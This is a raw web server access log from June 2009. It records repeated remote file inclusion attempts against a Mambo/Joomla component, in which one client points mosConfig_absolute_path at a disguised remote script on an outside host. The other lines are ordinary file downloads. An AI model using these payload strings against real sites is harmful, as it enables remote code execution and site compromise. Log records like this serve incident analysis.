84.201.208.50 - - [21/Jun/2009:12:34:09 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [21/Jun/2009:12:34:16 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:12:34:20 -0700] "GET /logs/access_081029.log%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:12:34:20 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [21/Jun/2009:12:34:20 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:12:34:25 -0700] "GET /logs/access_081016.log%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:12:34:34 -0700] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 200 20916 "-" "Mozilla/5.0" "www.dmulk.com"
